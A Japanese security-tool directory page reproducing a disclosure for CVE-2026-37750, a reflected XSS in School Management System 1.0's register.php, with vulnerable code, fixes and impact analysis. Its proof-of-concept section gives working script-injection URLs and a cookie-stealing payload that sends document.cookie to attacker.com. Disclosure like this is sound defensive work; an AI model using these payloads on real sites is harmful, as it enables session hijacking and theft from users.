Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-37750 — School Management System 1.0 用の反射型XSS概念実証であり、register.php の type パラメータを介した未認証の JavaScript 実行を実証し、影響分析と是正ガイダンスを提供します。 | Kitploit
ツール/GitHubGitHub/menevarad007/cve-2026-37750
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティ学習と教育
GitHubmenevarad007/cve-2026-37750

CVE-2026-37750

School Management System 1.0 用の反射型XSS概念実証であり、register.php の type パラメータを介した未認証の JavaScript 実行を実証し、影響分析と是正ガイダンスを提供します。

リポジトリを見る
4ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-37750 — School Management System 1.0 - 反射型XSS

詳細

フィールド情報
CVE IDCVE-2026-37750
タイプ反射型クロスサイトスクリプティング(XSS)
深刻度中(CVSSv3: 6.1)
ベンダーmahmoudai1
製品School Management System
バージョン1.0
発見者Varad AP Mene
日付2026-04-16
CWECWE-79

説明

mahmoudai1によるSchool Management System 1.0の反射型クロスサイトスクリプティング(XSS)脆弱性により、認証されていないリモート攻撃者が、register.phpのサニタイズされていないtypeパラメータを介して、被害者のブラウザで任意のJavaScriptを実行できます。このパラメータは、22行目のh1タグ内と26行目のform action属性内でエスケープされずに反映されます。この脆弱性を悪用するために認証は必要ありません。

CVE ID: CVE-2026-37750 CWE: CWE-79 CVSSv3: 6.1 中(AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)


製品説明

School Management System 1.0は、mahmoudai1がGitHubで公開しているPHP/MySQLウェブアプリケーションで、学校における生徒、教師、保護者の管理に使用されます。

ベンダーURL: https://github.com/mahmoudai1/school-management-system


脆弱性のあるファイル

register.php — 登録フォーム(認証不要)


脆弱なコード

22行目: echo ucfirst($_REQUEST['type'])

26行目: echo $_REQUEST['type']

htmlspecialchars()が使用されていない — 生のユーザー入力がそのままHTMLに反映されます。


概念実証

前提条件:

  • 認証は不要
  • ターゲットがSchool Management System 1.0を実行している必要があります

ステップ1 — ブラウザを開き、このURLにアクセスします: http://target/register.php?type=script-alert-document.cookie-/script

ステップ2 — ブラウザでJavaScriptが実行されます 結果: セッションクッキーを表示するアラートボックスが表示されます。

ステップ3 — クッキー窃取ペイロード: http://target/register.php?type=script-document.location-http://attacker.com/steal?c=-document.cookie-/script ステップ4 — フォームアクション注入ペイロード: http://target/register.php?type="-script-alert(1)-/script

確認された2つの注入ポイント:

注入ポイント1 — h1タグ内(22行目):

root@kitploit:~
echo ucfirst($_REQUEST['type'])

出力:

root@kitploit:~
<h1><script>alert(1)</script> Application</h1>

注入ポイント2 — form action属性内(26行目):

root@kitploit:~
echo $_REQUEST['type']

出力:

root@kitploit:~
<form action="register.php?type=<script>alert(1)</script>">

影響

  • クッキー窃取によるセッションハイジャック
  • フィッシング — 偽のログインフォームの注入
  • リダイレクトによるマルウェア配布
  • 認証は不要

修正方法

22行目の修正: echo htmlspecialchars(ucfirst($_REQUEST['type']), ENT_QUOTES, 'UTF-8');

26行目の修正: echo htmlspecialchars($_REQUEST['type'], ENT_QUOTES, 'UTF-8');


参考情報

  • https://github.com/mahmoudai1/school-management-system
  • https://github.com/mahmoudai1/school-management-system/blob/main/register.php

発見者

Varad AP Mene メール: [email protected] GitHub: https://github.com/menevarad007

ツールをダウンロード